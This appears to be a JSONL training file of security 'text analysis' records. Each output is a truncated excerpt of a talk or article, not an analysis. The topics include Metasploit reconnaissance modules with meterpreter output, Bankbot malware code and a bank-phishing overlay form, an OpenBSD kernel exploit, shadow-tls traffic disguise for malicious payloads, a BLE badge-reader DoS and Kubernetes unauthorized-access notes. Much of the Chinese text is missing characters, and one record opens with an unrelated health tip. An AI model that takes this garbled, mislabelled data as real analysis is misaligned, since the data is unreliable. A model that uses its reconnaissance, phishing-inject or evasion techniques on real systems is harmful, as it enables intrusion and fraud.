{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**注**请多喝点热水或者凉白开可预防**肾结石通风**等如有肾囊肿请定期检查肾囊肿的大小变化 **攻击机** 192.168.1.102 Debian **靶机** 192.168.1.2 Windows 7 192.168.1.115 Windows 2003 192.168.1.119 Windows 2003 **第一季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/discovery/arp_sweep * auxiliary/scanner/discovery/udp_sweep * auxiliary/scanner/ftp/ftp_version * auxiliary/scanner/http/http_version * auxiliary/scanner/smb/smb_version **第二季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/ssh/ssh_version * auxiliary/scanner/telnet/telnet_version * auxiliary/scanner/discovery/udp_probe * auxiliary/scanner/dns/dns_amp * auxiliary/scanner/mysql/mysql_version **第三季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/netbios/nbname * auxiliary/scanner/http/title * auxiliary/scanner/db2/db2_version * auxiliary/scanner/portscan/ack * auxiliary/scanner/portscan/tcp **第四季主要介绍scanner下的五个模块辅助发现内网存活主机分别为** * auxiliary/scanner/portscan/syn * auxiliary/scanner/portscan/ftpbounce * auxiliary/scanner/portscan/xmas * auxiliary/scanner/rdp/rdp_scanner * auxiliary/scanner/smtp/smtp_version **第五季主要介绍scanner下的三个模块以及db_nmap辅助发现内网存活主机分别为** * auxiliary/scanner/pop3/pop3_version * auxiliary/scanner/postgres/postgres_version * auxiliary/scanner/ftp/anonymous * db_nmap **第六季主要介绍post下的六个模块辅助发现内网存活主机分别为** * windows/gather/arp_scanner * windows/gather/enum_ad_computers * windows/gather/enum_computers * windows/gather/enum_domain * windows/gather/enum_domains * windows/gather/enum_ad_user_comments 在实战过程中许多特殊环境下scannerdb_nmap不能快速符合实战渗透诉求尤其在域中的主机存活发现而post下的模块弥补了该诉求以便快速了解域中存活主机 ### 二十五基于windows/gather/arp_scanner发现内网存活主机 ```bash meterpreter > run windows/gather/arp_scanner RHOSTS=192.168.1.110120 THREADS=20 [*] Running module against VM_2003X86 [*] ARP Scanning 192.168.1.110120 [+] IP: 192.168.1.115 MAC 00:0c:29:af:ce:cc (VMware, Inc.) [+] IP: 192.168.1.119 MAC 00:0c:29:85:d6:7d (VMware, Inc.) ``` ![](media/21a718cf4696c8d5f2290c93327dd924.jpg) ### 二十六基于windows/gather/enum_ad_computers发现域中存活主机 ```bash meterpreter > run windows/gather/enum_ad_comp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## How to setup a ftp server quickly Pleaes install [**pyftpdlib**](https://github.com/giampaolo/pyftpdlib) with pip or easy_install. ``` sudo easy_install pysendfile sudo easy_install pyftpdlib ``` or ``` sudo pip2 install pysendfile sudo pip2 install pyftpdlib ``` If you have installed **pyftpdlib** successfully, please start it as follow: ``` root@lab:/tmp/pyftpdlib# python -m pyftpdlib -w -p 21 pyftpdlib/authorizers.py:240: RuntimeWarning: write permissions assigned to anonymous user. RuntimeWarning) [I 2016-03-06 10:00:11] >>> starting FTP server on 0.0.0.0:21, pid=2090 <<< [I 2016-03-06 10:00:11] concurrency model: async [I 2016-03-06 10:00:11] masquerade (NAT) address: None [I 2016-03-06 10:00:11] passive ports: None [I 2016-03-06 10:00:40] 192.168.1.103:52874-[] FTP session opened (connect) [I 2016-03-06 10:00:40] 192.168.1.103:52874-[anonymous] USER 'anonymous' logged in. [I 2016-03-06 10:00:45] 192.168.1.103:52874-[anonymous] FTP session closed (disconnect). [I 2016-03-06 10:01:42] 192.168.1.101:49312-[] FTP session opened (connect) [I 2016-03-06 10:02:12] 192.168.1.101:49312-[] FTP session closed (disconnect). [I 2016-03-06 10:02:24] 192.168.1.101:49313-[] FTP session opened (connect) [I 2016-03-06 10:02:31] 192.168.1.101:49313-[anonymous] USER 'anonymous' logged in. [I 2016-03-06 10:06:28] 192.168.1.101:49313-[anonymous] RETR /tmp/pyftpdlib/setup.py completed=1 bytes=5183 seconds=0.004 [I 2016-03-06 10:07:29] 192.168.1.101:49313-[anonymous] FTP session closed (disconnect). [I 2016-03-06 10:08:11] 192.168.1.104:1033-[] FTP session opened (connect) [I 2016-03-06 10:08:17] 192.168.1.104:1033-[anonymous] USER 'anonymous' logged in. [I 2016-03-06 10:10:43] 192.168.1.104:1033-[anonymous] FTP session closed (disconnect). ``` Windows FTP console client: ``` C:\\Documents and Settings\\test\\Desktop>ver Microsoft Windows XP [Version 5.1.2600] C:\\Documents and Settings\\test\\Desktop>ftp 192.168.1.103 Connected to 192.168.1.103. 220 pyftpdlib 1.5.0 ready. User (192.168", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. GoPro or GTFO A Tale of Reversing an Embedded System Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Agenda Intro GoPro Overview Previous Research Methodology/Findings Future Research/Next Steps Conclusion Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. INTRO Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. About Us  Todd Manning a.k.a. El Isleño  Sr. Research Consultant, Accuvant LABS Applied Research Consulting  Previously Mgr. of Security Research at BreakingPoint Systems  Zach Lanier a.k.a. quine  Sr. Research Consultant, Accuvant LABS Applied Research Consulting  (Net | App | Web | Mobile) pen tester type Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Why the GoPro?  Highly popular, consumer rugged camera  WiFi-enabled  Possible applicability to other Amberella-based devices  Including commercial IP-enabled CCTV installations  We focused mainly on GoPro Hero3 Black Edition  So most details apply, but may be some HW differences  Plus: ITS EXTREEEEEEEEEEEEEEME! Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. GOPRO OVERVIEW Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved.  Ambarella A770 camera SoC  ARMv6 1136J-S core (@528MHz)  Sitronix ST7585 LCD  Atheros AR6233GEAM2D 802.11n + BT controller  and more... GoPro Overview Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved.  H3B runs two operating systems:  ITRON  Embedded RTOS  Manages most of the camera bits  Runs the GoPro Webserver on 80/tcp  Internal interface to Linux (10.9.9.9)  Linux 2.6.38  Actually runs as a task within ITRON  Resides on", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnalyzing Bankbot whoami Malware Analyst at Hispasec.    @entdark_ What is Bankbot? Origins 6 7    8 AV detections 9 1 0 1 1 1 2 Overlays     1 3 Android Toast     1 4 1 5 Cloak & Dagger Client side 1 7 Infection workflow 1 8 Malicious websites are still a thing 1 9 Infection workflow if (Build.VERSION.SDK_INT >= 23) { int i = checkCallingOrSelfPermission(\"android.permission.SEND_SMS\"); if ((Build.VERSION.SDK_INT >= 23) && (i != 0)) { requestPermissions(new String[] { \"android.permission.SEND_SMS\", \"android.permission.READ_CONTACTS\", \"android.permission.ACCESS_FINE_LOCATION\" }, 1); } } 2 1 Infection workflow  android.permission.SEND_SMS  android.permission.READ_CONTACTS  android.permission.ACCESS_FINE_LOCATION  android.permission.DEVICE_ADMIN 2 2 Device Admin? 2 3 Data theft 2 4 Data theft 2 5 Comparison: Real Login vs Overlay 2 6 Initial targets                2 7 Increasing targets Commerzbank Royal Bank of Scotland, Santander Lloyds... 2 8 Target injects retrieval if (packagename.equals(ru.sberbankmobile)) { ... } 2 9 APK has no information of the targeted entities Target injects retrieval 3 0 Targets 3 1 Targets 3 2 3 3 JNI  Arm64-v8a  armeabi  armeabi-v7a 3 4 JNI 3 5 JNI 3 6 JNI getProc() /proc /proc/cmdline 3 7 JNI send_sms /android/telephony/SmsManager/ sendTextMessage 3 8 JNI Server side 4 0 Backend 4 1 C&C        IMEI CARRIER/PHN NO VERSION, APK, COUNTRY MODEL DATE ACTIONS 4 3 Components  add_inj.php  add_log.php  commands.php  config.php  crypt.php  kliets.php  tuk_tuk.php  set_data.php 4 4 Communications <tag>37 55 67 78 79 37 55 67</tag> <form action=\"/private/add_inj.php?p=5w 53 56 53 5w 55 48 5e 55 54 54 53 55 48 55 37 55 67 37 68 48 37 57 7q 37 68 49 37 56 48 7 68 48 37 66 56 37 68 48 37 66 5q 37 68 48 37 66 48 37 68 49 37 56 5q 5q 5e 37 55 67\"method=\"post\"id=\"mf\"name=\"mf\"onsubmit=\"return true\"> <input type=\"tel\" value=\"+380\" placeholder=\"Логин\" id=\"privat24-login\" name=\"privat24_login\" maxlength=\"13\"> <input placeholder=\"Пароль\" id=\"privat24-password", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nANATOMY OF A PEN TEST Understanding the [ Mindset | Toolset ] of Penetration Testers ANATOMY OF A PEN TEST Poppin Boxes Like a Pro  Handle == [ PushPin | Revolver ] !  DEF CON Attendee - DC15 - Present1!  U.S. Department of Energy Contractor - A few years3!  Co authored The Hacker's Guide to OS X - Kinda neat!  U.S. Department of State Contractor - For a bit !  Sony PlayStation - Now Alijohn Ghassemlouei Profile Reality Check | Disclaimers Hacking in movies != Reality Running scripts != [ Hacker | Pentester | Programmer ] Understanding core technologies are crucial Overnight penetration tester? Hell no. Developing and refining your skill set takes time Documentation & boring stuff? Unfortunately, yes Set expectations and common terminology early Audience | Query Audience | Query What is your definition of a penetration test? Considerations | Penetration Testing A penetration test is a method of evaluating the security controls of an asset, system, or network through the emulation of malicious or unauthorized actors with limited knowledge. ! This is achieved by demonstrating the execution of the objective at a technical level which should improve the effectiveness and efficiency of the existing security controls in place.1 Considerations | Penetration Testing security is not a state, nor a product, it is an ongoing process Considerations | Penetration Testing a snapshot of an asset in a specific state at a specific time Assessment Types | General Information  Vulnerability Assessment - [ 2 to 4 weeks ]!  Complete stakeholder assistance, credentialed scans, interviews, in-depth review, narrow scope  Penetration Test - [ 2 to 6 weeks ]!  Partial stakeholder assistance via trusted agent, partial site notification, larger scope  Red Team Assessment - [ 4 - 24 months ]!  Limited stakeholder assistance, no site information, largest scope Audience | Vote Audience | Vote IN HOUSE or EXTERNAL INDEPENDENT OVERSIGHT / THIRD PARTY / EXTERNAL ENT-TITTY DIRECTOR CIO CISO COO SYSTEMS NETW", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: TF入门以及在云上攻防中的作用 --- <center><h1>Terraform 使用入门以及在云上攻防中的作用</h1></center> --- ## 0x00 前言 Terraform 是一种资源编排工具通过它可以很方便的去构建云服务资源本文将以在腾讯云上创建一个 COS 存储桶为例进行演示 ## 0x01 Terraform 概述 Terraform 官方下载页面[terraform.io/downloads](https://www.terraform.io/downloads) 在这里找到自己的系统进行安装即可 目前 Terraform 基本已经支持了大部分主流的云服务厂商在 [registry.terraform.io/browse/providers](https://registry.terraform.io/browse/providers) 中可以看到其所支持的云服务厂商 本文中将使用腾讯云作为演示在平时使用 Terraform 时会频繁的去参考官方文档其腾讯云的官方文档地址为[registry.terraform.io/providers/tencentcloudstack/tencentcloud/latest/docs](https://registry.terraform.io/providers/tencentcloudstack/tencentcloud/latest/docs) ## 0x02 开始编写 首先创建一个文件夹这里文件夹名称为 cos_bucket_demo并新建以下文件 ```shell .  cos_bucket_demo  README.md  main.tf  output.tf  terraform.tfvars  variables.tf  version.tf ``` - README.md 描述文件 - main.tf Terraform 主体代码文件 - output.tf 内容输出代码文件 - terraform.tfvars 参数文件 - variables.tf 变量声明文件 - version.tf 版本信息文件 可以看到在 cos_bucket_demo 文件夹中有多个 tf 后缀的文件其实这些 tf 文件里的代码都可以写到一个 tf 文件里但一般为了规范些还是建议分多个 tf 文件去写一个文件夹对应一个 tf 场景 接下来我们来看看每个 tf 文件里都有哪些内容 ### version.tf version.tf 一般是放和版本信息有关的代码例如这里就是声明了 Provider 来源为 tencentcloud 且版本为 1.72.5Provider 在这里可以理解成提供云服务的厂商的意思 ```json terraform { required_providers { tencentcloud = { source = \"tencentcloudstack/tencentcloud\" version = \"1.72.5\" } } } ``` 如果经常使用某个云的 Provider建议指定固定的版本这样在开启插件缓存后每次初始化 Terraform 时就不会因为 Provider 有更新了而要重新下载它同时还会避免因为 Provider 更新导致代码不可用或者出现告警的情况 开启插件缓存方法可以参考[wiki.teamssix.com/CloudNative/Terraform/terraform-enable-plugin-cache.html](https://wiki.teamssix.com/CloudNative/Terraform/terraform-enable-plugin-cache.html) ### variables.tf variables.tf 里一般会写上变量的声明例如这里需要声明腾讯云的 secret id 和 secret key 变量 ```json variable \"tencentcloud_secret_id\" { type = string description = \"Set Tencent Cloud secret id.\" sensitive = true nullable = false } variable \"tencentcloud_secret_key\" { type = string description = \"Set Tencent Cloud secret key.\" sensitive = true nullable = false } ``` 其中 variable 后面的是变量名称type 指定变量类型description 用来描述变量的用途sensit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# \"Wee\" Challenges Several challenges were related to a single website running a \"paperbots\" service. All related challenges included the following explanations: > Good coders should learn one new language every year. > > InfoSec folks are even used to learn one new language for every new problem they face (YMMV). > > If you have not picked up a new challenge in 2018, you're in for a treat. > > We took the new and upcoming `Wee` programming language from paperbots.io. Big shout-out to Mario Zechner (@badlogicgames) at this point. > > Some cool Projects can be created in Wee, like: [this](https://paperbots.io/project.html?id=URJgCh), [this](https://paperbots.io/project.html?id=kpyyrl) and [that](https://paperbots.io/project.html?id=F53thj). > > Since we already know Java, though, we ported the server (Server.java and Paperbots.java) to Python (WIP) and constantly add awesome functionality. > Get the new open-sourced server at `/pyserver/server.py`. > > Anything unrelated to the new server is left unchanged from commit `dd059961cbc2b551f81afce6a6177fcf61133292` at badlogics [paperbot github](https://github.com/badlogic/paperbots (mirrored up to this commit [here](https://github.com/domenukk/paperbots/)). > > We even added new features to this better server, like server-side Wee evaluation! > > To make server-side Wee the language of the future, we already implemented awesome runtime functions. > To make sure our VM is 100% safe and secure, there are also assertion functions in server-side Wee that you don't have to be concerned about.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOpenBSD Remote Exploit Only two remote holes in the default install Alfredo A. Ortega July 5, 2007 Mbuf buffer overflow Buffer overflow Researching the OpenBSD 008: RELIABILITY FIX a new vulnerability was found: The m dup1() function causes an overflow on the mbuf structure, used by the kernel to store network packets. mbuf1 mbuf2 mbuf3 mbuf4 End of overflow Copy direction Figure: mbuf chain overflow direction The function m freem() crashed... Searching for a way to gain code execution Searching for a way to gain code execution C code equivalent / s y s /mbuf . h #d e f i n e MEXTREMOVE(m) do { \\ i f (MCLISREFERENCED(m)) { \\ MCLDEREFERENCE(m) ; \\ } e l s e i f ((m)>m f l a g s & M CLUSTER) { \\ p o o l p u t (&mclpool , (m)>m ext . e x t b u f ) ; \\ } e l s e i f ((m)>m ext . e x t f r e e ) { \\ (((m)>m ext . e x t f r e e ) ) ( (m)>m ext . ext buf , \\ (m)>m ext . e x t s i z e , (m)>m ext . e x t a r g ) ; \\ } e l s e { \\ f r e e ((m)>m ext . ext buf , (m)>m ext . e x t t y p e ) ; \\ } \\ (m)>m f l a g s &= (M CLUSTER|M EXT ) ; \\ (m)>m ext . e x t s i z e = 0; / why ??? / \\ } while (/ CONSTCOND / 0) IcmpV6 packets Attack vector We use two IcmpV6 packets as the attack vector Header Fragmentation Header IPv6 Header Mbuf chain Fragment 2 Icmpv6 Icmpv6 Header Trampoline ShellCode SyscallHook Payload Header mbuf 2 mbuf 1 Header mbuf 3 HopbyHop Header Fragmentation Header IPv6 Header Fragment 1 Figure: Detail of IcmpV6 fragments Where are we? Code execution We really dont know where in kernel-land we are. But ESI is pointing to our code. User process Hooked syscall ShellCode Kernel Ring 0 Ring 3 Kernel Int 0x80 ShellCode ? ? ? ? ? ? ? ? ? ? ? Initial situation Final situation iret Where we are? Ring 0 ESI Figure: Initial and final situations Now what? Hook (remember DOS TSRs?) We hook the system call (Int 0x80) User process INT 0x80 Kernel return Hook Hooked syscall User process INT 0x80 Kernel Ring 3 Ring 0 return Normal syscall Normal System Call Hooked System Call Figure: Syst", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n做为攻击者那些年的一些想法 今年职业上有了一点小变动从一个攻击者变成了一个防御者于是想把作为攻击者的一些想法写下来 和大家交流 某大型攻防演练暂告段落攻击者们在弹冠相庆之后纷纷借着五一休假了攻击方投入越来越大攻击 模式的体系化流程化攻击工具工程化实战化以肉眼可见的速度发展着作为一个曾经的攻击 者内心是非常激动的虽然已是局外人但每每听到攻击方的故事还是会热血沸腾 我眼中的红队 曾经和朋友聊什么是红队怎么做一只符合国情的红队也阅读过很多国外红队报告一度被各种高超 的红队技巧迷花了眼都说红队是在模仿APT攻击但在前公司有幸参加金链熊分析后我意识到红队 如果是以模仿APT的路子走是不对的红队和APT有着本质的区别红队的出发点是让你的目标更加的安 全而APT的出发点是获取情报因此整个执行的流程细节都有着很大的差别它们唯一相通的或者说 可以借鉴的是部分攻击技术 红队永远不是主角也不应该是主角红队评估红队是评估的助手红蓝对抗红队是蓝队的助手 红队是在模仿敌人模仿攻击者因此红队在我方阵营中不应该也不会是主角它只有在敌方阵营中才 是主角 红队要有自己的体系大家经常也会讨论某某红队主要是以什么方法打的每个攻击环节他们是怎么串 起来的每个优秀的红队都有各自的风格这就是体系的雏形我想以后的红队应该是一个百家争鸣的 状态甲方的蓝军乙方的红队红队创业公司各有各的体系各有各的风格 不要想着既要还要红队不太可能既纵向做的深入也横向覆盖的广红队的投入是有限的而且是偏低 的助手和主角助手投入盖过主角是不可能的因此红队必然是小而精的不可能是大而全的 红队不要做成打手了虽然这是现状不可否认当前红队的商业价值来源于打手属性这几年以政策 为主的推动使得打手属性的价值放大了很多倍很多小伙伴也获益颇丰甚至以此创业看过古惑 仔电影的小伙伴应该明白打手的结局都不太好 但也不要否认当前的打手阶段我想打手阶段应该算红队v0.5版本当打手价值放大到一定程度的 时候必将引起质变我想接下来走向红队v1.0的路应该是在红队评估的评估上做文章应该是在红 蓝对抗的蓝上思考这才是真正能够产生红队长远价值的地方我想在评估上做的好在蓝上想的 深红队的价值也就越大 我眼中的红队工具 红队工具不等于攻击工具红队工具是红队人员执行攻击思路和方法的武器就像士兵手中的枪炮手 面前的炮亦或者指挥官手中的传令器但子弹和炮弹不是真的我们要去掉弹头去掉破坏力这只 是演习 往往在一次红队行动中攻击可控可溯源是一个很大的难题我想它的解法在红队工具中红队工具 的发展应该是从小作坊到工程化再到系统化在系统化的时候攻击的可控可溯是可以做到的日志 埋点网关控流还原每一步操作梳理每一个请求但是这样高昂的投入目前看是不现实的必然 需要更大的市场政策和商业价值来驱动 当前的现状是什么样呢近几年所谓的红队工具还只能叫做攻击工具因为它只是攻击技术的执行程序 而已还必须给他增加紧箍咒才能是红队工具 我曾经做过一个问卷CobaltStrike是不是一个远控木马我的本意是想知道大家觉得CobaltStrike是好 的还是坏的结果有点意料之中也有点出乎意料意料之中的是坏多于好出乎意料的是认为好的占比 只比坏的低一点 这是一个共识问题拿切菜的刀举例它固有的锋利让他既能违法也能切菜但是因为有菜这个字 让菜刀也能在商店购买我希望以后红队工具因为有红队2个字让它也可以被大家普遍使用 曾经画过一个简图 安全社区很重要 很多和我一样的小伙伴都是从社区学习成长一路走出来的社区一直在生死轮回中循环每个阶段 有每个阶段的不同表现形式从最早的论坛到现在的漏洞平台SRC从线上的YYQQ到线下hackclub 我想最后必将走出一种各方共赢的方式是谁会站出来呢是360漏洞云还是奇安信补天亦或是阿 里先知白帽汇 我曾经也有设想做一个有知识星球群博客论坛开源项目公益资源训练平台等等哈哈已 是往事其中公司之间的利益纠葛法律界定都是需要考虑和寻解的也多次被老板挑战这能给公司带 来什么实质利益 举一个例子曾经有个小伙伴在A-Team星球发了一个话题然后被主管训了一顿勒令删除还被...... 此处略过一万字最后愤然离职了可能有小伙伴会说你和公司签了劳动合同你的所有产出不管是 上班下班都是公司财产我觉得这里面需要有一个界定和共识涉及到公司项目以及成果的当然应该保 密但是纯底层技术交流不应该被扼杀不要因为你是A公司的员工在B公司技术论坛上学习的时候顺便 回答一个技术问题就被扣上一个资敌的帽子 往事已矣......", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 shadow tls 最近看到v2ex上有分享了个有意思的技术 https://v2ex.com/t/875975 前 2 简单来说这个技术可以在tls握阶段实现完全合法有效的与指定域名站的握后续的传输数据 阶段则是传输身的恶意payload 这样我可以让tls握阶段SNI以及证书同步伪装使得流量更加可信 对应的demo项 https://github.com/ihciah/shadow-tls 分析之前先搞清楚tls的协议结构 1. tls分为两层记录层和握层记录层只有种记录协议握层有4种协议HandshakeAlert ChangeCipherSpecApplicationData 2. 协议流程握阶段和数据传输阶段握阶段常到的握层协议有HandshakeAlert ChangeCipherSpec数据传输阶段就是ApplicationData 先说下分层如下图所示 tls协议 3 记录层的协议只有记录协议度5字节 记录层 4 记录协议负责在传输连接上交换的所有底层消息并且可以配置加密每条 TLS 记录以个短标头开 始标头包含记录内容的类型 (或协议)协议版本和度原始消息经过分段 (或者合并)压缩添加 认证码加密转为 TLS 记录的数据部分 Content Type(1 bytes)于标识握层协议类型 Version(2 bytes)tls版本信息 Length(2 bytes)握层数据包度 PS: 简单来说记录协议主要功能是对握层进数据压缩加密完整性保护等等 Content Type有4个值参考go官库说明如下可以看到这些类型在上数据包中也有记录 Version    type recordType uint8 const ( recordTypeChangeCipherSpec recordType = 20 recordTypeAlert recordType = 21 recordTypeHandshake recordType = 22 recordTypeApplicationData recordType = 23 ) 1 2 3 4 5 6 7 8 Go 复制代码 const ( VersionTLS10 = 0x0301 VersionTLS11 = 0x0302 VersionTLS12 = 0x0303 VersionTLS13 = 0x0304 // Deprecated: SSLv3 is cryptographically broken, and is no longer // supported by this package. See golang.org/issue/32716. VersionSSL30 = 0x0300 ) 1 2 3 4 5 6 7 8 9 10 Go 复制代码 5 Handshake Alert ApplicationData 握层 6 ChangeCipherSpec 如果了解过tls协议会知道tls分为握阶段以及数据传输阶段 交互流程如下握阶段主要进共享密钥成以及身份认证数据传输阶段就使成的共享密钥进 加密传输 数据包交互 7 数据包 8 代码实现层 在通过tls封装后write实际操作如下会进Handshake 9 判断握是否完成 10 未完成握会调握函数但这可以看到只是个函数签名因为对于server和client的握处理是 不样的需要传不同的函数实现 11 如 clientHandshake 会成clientHello发送并读取serverHello等系列操作 12 根据上的简单分析握阶段服务端会返回个Certificate包包含了该服务端的tls证书其中还 包含了证书链这也是我们浏览器上能查看服务端证书的原因并且可以根据证书链来校验证书合法 性 分析 13 数据传输阶段数据包格式较为固定均为Application Data并且握层般是通过握阶段协商好 的密钥进加密传输的 所以shadow tls的实现原理也就出来了 1. 握阶段服务端将客户端的请求转发到个可信域名上这样保证流量侧看到的服务端证书是个 可信域名的证书 2. 等握完成后数据传输阶段停转发客户端和服务端之间加密传输恶意payload即可那么这 就有个疑问了由于tls的防中间攻击使的是对称算法进握协商出共享密钥我的 服务端是拿不到的其实这个所谓我看不到中间设备也同样看不到那么我的客户端和服务端 个假的密钥加密数据伪造个Application Data进传输在中间设备看起来也是完全正常的 实现 14 原理就这么简单实现的话只需要注意下握结束的标识将转发模式切换成恶意payload通信模式 即可我这选择的是判断接收到第个application data协议的包则切换模式 编写前review了下官t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDown With The RIAA Musicians Against the Recording Industry By: Ichabod Ver7 Independent artist/producer www.loopbackimposter.com Priceless  New computer: $900  I/O box: $500  Studio monitors and Microphone: $900  Telling the RIAA to go fsck themselves: Priceless Purpose of this Presentation  This presentation is for enlightening individuals on the current state of the music business and provides a way to completely change it in the future so that it better suits both artists and consumers.  Prove that you dont need a big recording studio to make a good recording Whats the Problem? The recording industry isnt about music, its about:  Money for the company  Image and product  Applying formulas to artistic works  Telling people This is cool, you should buy this.  Not caring for the consumers of their products  Benefiting only a few Whats the Problem?  Payola - Yes it does happen  Resistant to change  They dont think, they just have knee jerk reactions  Its not how good you are its who you know  Artists retain little rights, if any, over their music  Pirate Act: Lobbying to get copyright civil suits changed to criminal Money for the Company  Getting a recording contract is like winning the lottery, only winning the lottery you are guaranteed some money  90% of major label releases dont make a profit  Companies sign bands as tax write-offs and then dump them after the first of the year  Overpriced CDs Why does a CD Cost so Much?  Record company: Manufacturing CDs is expensive!  Survey says: Mass produced, replicated CDs are less than a dollar for the total package. -Side note: AOL gives away a ton of CDs  Record Company: It costs a lot to record a CD.  Survey says: Recording advances are given to artists which they have to pay back. Company doesnt take the hit, unless they want to or unless it was stated in the contract the company would pay. They Resist Change  Fight tooth and nail to keep things the same  What happens to other companies that resist change?  If record ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat is the PACS-Man? Tools of The Trade How do we improve the experience in the field? Automation! Demo Time Contribute to Odo! (its a framework)  Potential Credential Producers  BLEKey  ESP RFID Tool  Wiegotcha  Telephoto Lens + OCR  Potential Credential Consumers  Chameleon Mini  Libnfc  Emutag  Support for Alternate Displays / Hats  New Feedback and Control Mechanisms  Smart Watch Support  Android / iOS Apps  Haptic Feedback Vests Evolution of PACS Mobile Credentials Are the New Black  Mobile Credentials are the New Thing  NFC  Not Supported by All Smartphones  Until Recently Heavily Locked Down on iOS  BLE  Nearly Ubiquitous Smartphone Support  Protocol Was Not Designed for This Purpose What Else Does This Add?  Diagnostic Capability  Firmware Upgrades  Reconfiguration Hmm Bluetooth You might be wondering whats with all readers? Demo Time What else has an nRF52? Demo Time So what does it all mean? Practical Impacts  Selective or Area-Wide Denial of Service  Disable Access to Key Ingress/Egress Points  Turnstiles  Security Vestibules  Equipment Rooms  Annoy the Crap Out of People by Beeping All Readers  Engage DoS Post-Entry to Evade Security  Ghost Mode  Slip a Device Into Target Users Bag to DoS 2 Closest Readers  User Becomes Invisible to Readers Mitigations  Vendor Response  Working on Upcoming Firmware Update  Currently Requires Use of Mobile App at Each Reader  Future Updates via OSDP Functions (For Supported HW)  Short-Term Mitigation  Educate Security Staff and Response Teams  Some Customers May Opt to Disable BLE Functionality  Affected Customers Should Reach Out to Their Account Manager for Guidance  Customers Not Using Mobile Credentials May Inquire about ODSP-Only Backpacks", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 KWs 备忘录 前 简介&&基础知识 暴漏梳理 etcd-未授权访问 kube-apiserver未授权访问 kubelet未授权访问 kWs dashboard认证绕过CVE-OLNW-NWOTQ docker未授权访问 kube-proxy配置错误 参考章 致谢 最近做了个某央企的内部攻防项在这种项中次深深体会到的菜加之球以来直 没有发过章主管都准备踢我出球了所以特地篇章 找了找星球还没有k8s之类的章于是章思想更重 之前从来没怎么接触过k8s但是随着云原以及微服务架构的兴起云原必定是攻防重点很多试 也会问k8s的渗透经验这次侥幸内后也正好发现k8s集群所以有了个预习的机会特地写篇 备忘录作为备忘佬们请轻喷 k8s全称kubernetes是为容器服务的个可移植容器的编排管理具越来越多的公司正在拥抱 k8s并且当前k8s已经主导了云业务流程推动了微服务架构等热技术的普及和落地 先我们从容器技术谈起在容器技术之前家开发虚拟机较多如vmware和openstack 我们可以使虚拟机在我们的操作系统中模拟出多台电脑Linux电脑之间是相互隔离的但是 虚拟机对于开发和运维员存在启动慢占空间不易迁移的缺点 前 简介&&基础知识 2 接着容器化技术应运它不需要虚拟出整个操作系统只需要虚拟个规模的环境即可且 启动速度很快除了运其中应以外基本不消耗额外的系统资源Docker是应最为泛的容器技 术通过打包镜像启动容器来创建个服务但是随着应越来越复杂容器的数量也越来越多由 此衍了管理运维容器的重问题且随着云计算的发展云端最的挑战容器在漂移在此业务 驱动下k8s问世提出了套全新的基于容器技术的分布式架构领先案在整个容器技术领域的发展 是个重突破与创新 从架构设计层k8s的可性伸缩性都可得到很好的解决如果你想使微服务架构搭配k8s真 的是完美再从部署运维层服务部署服务监控应扩容和故障处理k8s都提供了很好的解决 案 具体来说主要包括以下点 1. 服务发现与调度 2. 负载均衡 3. 服务愈 4. 服务弹性扩容 5. 横向扩容 6. 存储卷挂载 总之k8s可以使应的部署和运维更加便 最后我们看下k8s的架构 3 k8s集群由Master节点和NodeWorker节点组成 Master节点 Master节点指的是集群控制节点管理和控制整个集群基本上k8s的所有控制命令都发给它它负责具 体的执过程在Master上主要运着 1. Kubernetes Controller Managerkube-controller-managerk8s中所有资源对象的动化控制 中维护管理集群的状态如故障检测动扩展滚动更新等 2. Kubernetes Schedulerkube-scheduler 负责资源调度按照预定的调度策略将Pod调度到相 应的机器上 3. etcd保存整个集群的状态 Node节点 除了master以外的节点被称为Node或者Worker节点可以在master中使命令 kubectl get nodes查看 集群中的node节点每个Node都会被Master分配些作负载Docker容器当某个Node宕机时 4 该节点上的作负载就会被Master动转移到其它节点上在Node上主要运着 1. kubelet负责Pod对应的容器的创建启停等任务同时与Master密切协作实现集群管理的基本 功能 2. kube-proxy实现service的通信与负载均衡 3. dockerDocker EngineDocker引擎负责本机的容器创建和管理 